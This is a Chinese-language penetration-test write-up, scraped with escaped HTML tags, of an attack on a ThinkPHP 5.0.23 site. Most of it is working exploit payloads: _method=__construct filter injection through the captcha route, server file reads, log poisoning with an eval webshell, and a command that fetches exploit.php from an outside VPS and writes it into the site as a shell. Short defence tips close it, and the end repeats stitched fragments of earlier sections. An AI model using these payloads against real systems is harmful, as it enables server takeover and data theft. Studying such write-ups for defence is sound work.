ThinkPHP 5.0.23 渗透测试实战分析<\/h1>

1. 信息收集阶段<\/h2>

1.1 目标识别<\/h3>

目标URL: www.a.com\/admin<\/code><\/li>
自动跳转至: www.a.com\/admin\/publicer\/login<\/code><\/li>

框架识别: ThinkPHP 5.0.23 (在已知漏洞版本范围内)<\/li>
<\/ul>
1.2 初始漏洞探测<\/h3>
尝试使用以下常见ThinkPHP漏洞payload:<\/p>
index.php?s=index\/\think\app\/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
s=index\/\think\app\/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
_method=__construct&filter[]=system&method=GET&get[]=id
<\/code><\/pre>
发现均不成功，但确认目标开启了pathinfo模式。<\/p>
2. 验证码路由利用<\/h2>
2.1 验证码路由发现<\/h3>
访问 index.php?s=captcha<\/code> 成功，表明存在验证码路由。<\/p>
2.2 方法转换测试<\/h3>
将请求方法改为POST，尝试执行系统命令:<\/p>
POST \/?s=captcha HTTP\/1.1
_method=__construct&method=get&filter[]=system&server[REQUEST_METHOD]=1&get[]=id
<\/code><\/pre>
返回500错误，但使用var_dump<\/code>可以执行成功:<\/p>
_method=__construct&method=get&filter[]=var_dump&server[REQUEST_METHOD]=1&get[]=2
<\/code><\/pre>
2.3 PHP信息收集<\/h3>
成功执行phpinfo():<\/p>
_method=__construct&method=get&filter[]=phpinfo&server[REQUEST_METHOD]=1&get[]=4
<\/code><\/pre>
收集到关键信息:<\/p>

PHP版本: 7.2.18<\/li>
禁用函数列表: 包含passthru,exec,system,putenv等常见命令执行函数<\/li>
open_basedir限制: \/www\/wwwroot\/vulhostcn\/:\/tmp\/:\/proc\/<\/code><\/li>
文件路径: \/www\/wwwroot\/vulhost\/public\/index.php<\/code><\/li>
Session存储: Redis<\/li>
<\/ul>
3. 绕过限制尝试<\/h2>
3.1 文件包含利用<\/h3>
尝试通过文件包含执行代码:<\/p>
_method=__construct&method=get&filter[]=think\__include_file&server[]=-1&get[]=\/tmp\/sess_asd
_method=__construct&method=get&filter[]=think\Session::set&get[]=<?php x ?>
<\/code><\/pre>
由于Session存储在Redis中，此方法失败。<\/p>
3.2 Redis利用尝试<\/h3>
尝试通过Redis进行命令执行:<\/p>
_method=__construct&method=get&filter[]=think\__include_file&server[REQUEST_METHOD]=..\/data\/runtime\/log\/202004\/04.log&c=curl_exec(curl_init("dict:\/\/127.0.0.1:6379\/info"));
<\/code><\/pre>
失败告终。<\/p>
3.3 文件读取利用<\/h3>
成功使用readfile读取文件:<\/p>
_method=__construct&method=get&filter[]=readfile&server[REQUEST_METHOD]=\/www\/wwwroot\/vulhost\/public\/index.php
<\/code><\/pre>
确认了网站的实际路径为\/www\/wwwroot\/vulhostcn\/<\/code><\/p>
读取日志文件:<\/p>
_method=__construct&method=get&filter[]=readfile&server[REQUEST_METHOD]=\/www\/wwwroot\/vulhostcn\/data\/runtime\/log\/202004\/04.log
<\/code><\/pre>
4. 成功利用<\/h2>
4.1 日志文件包含<\/h3>
通过文件包含执行PHP代码:<\/p>
_method=__construct&method=get&filter[]=call_user_func&server[REQUEST_METHOD]=<?php eval($_POST['c']);?>
_method=__construct&method=get&filter[]=think\__include_file&server[REQUEST_METHOD]=..\/data\/runtime\/log\/202004\/04.log&c=phpinfo();
<\/code><\/pre>
4.2 写入Webshell<\/h3>
写入免杀shell:<\/p>
_method=__construct&method=get&filter[]=think\__include_file&server[REQUEST_METHOD]=..\/data\/runtime\/log\/202004\/04.log&c=file_put_contents("\/www\/wwwroot\/vulhostcn\/public\/themes\/admin_themes\/3.php",file_get_contents("http:\/\/vps:65534\/exploit.php"));
<\/code><\/pre>
4.3 目录浏览<\/h3>
查看目录内容:<\/p>
_method=__construct&method=get&filter[]=think\__include_file&server[REQUEST_METHOD]=..\/data\/runtime\/log\/202004\/04.log&c=print_r(scandir("\/www\/wwwroot\/vulhostcn\/public\/"));
<\/code><\/pre>
5. 其他利用思路<\/h2>
5.1 FPM利用<\/h3>
尝试通过PHP-FPM进行利用:<\/p>
$sock =<\/span> stream_socket_client<\/span>('unix:\/\/\/tmp\/php-fcgi.sock'<\/span>,$errno,$errstr);
<\/span><\/span><\/code><\/pre>5.2 Redis扩展利用<\/h3>
通过Redis上传.so文件实现命令执行。<\/p>
6. 总结<\/h2>
6.1 关键利用点<\/h3>

验证码路由s=captcha<\/code>的POST请求漏洞<\/li>
_method=__construct<\/code>参数注入<\/li>
通过文件包含执行日志文件中的PHP代码<\/li>
利用think\__include_file<\/code>进行文件包含<\/li>
<\/ol>
6.2 绕过技巧<\/h3>

使用未被禁用的函数如var_dump<\/code>、readfile<\/code>等<\/li>
通过文件包含绕过命令执行限制<\/li>
利用日志文件作为代码写入点<\/li>
<\/ol>
6.3 防御建议<\/h3>

及时升级ThinkPHP框架<\/li>
限制危险函数的使用<\/li>
严格控制文件写入权限<\/li>
日志文件不应存放在web可访问目录<\/li>
禁用不必要的路由和功能<\/li>
<\/ol>

ThinkPHP 5.0.23 渗透测试实战分析<\/h1>

1. 信息收集阶段<\/h2>

2. 验证码路由利用<\/h2>

2.1 验证码路由发现<\/h3> 访问 index.php?s=captcha<\/code> 成功，表明存在验证码路由。<\/p>

3. 绕过限制尝试<\/h2>

4. 成功利用<\/h2>

5. 其他利用思路<\/h2>

5.2 Redis扩展利用<\/h3> 通过Redis上传.so文件实现命令执行。<\/p>

6. 总结<\/h2>

6.3 防御建议<\/h3> 及时升级ThinkPHP框架<\/li> 限制危险函数的使用<\/li> 严格控制文件写入权限<\/li> 日志文件不应存放在web可访问目录<\/li> 禁用不必要的路由和功能<\/li> <\/ol>

2.1 验证码路由发现<\/h3>
访问 `index.php?s=captcha<\/code> 成功，表明存在验证码路由。<\/p>`

5.2 Redis扩展利用<\/h3>
通过Redis上传.so文件实现命令执行。<\/p>

6.3 防御建议<\/h3>

及时升级ThinkPHP框架<\/li>
限制危险函数的使用<\/li>
严格控制文件写入权限<\/li>
日志文件不应存放在web可访问目录<\/li>
禁用不必要的路由和功能<\/li> <\/ol>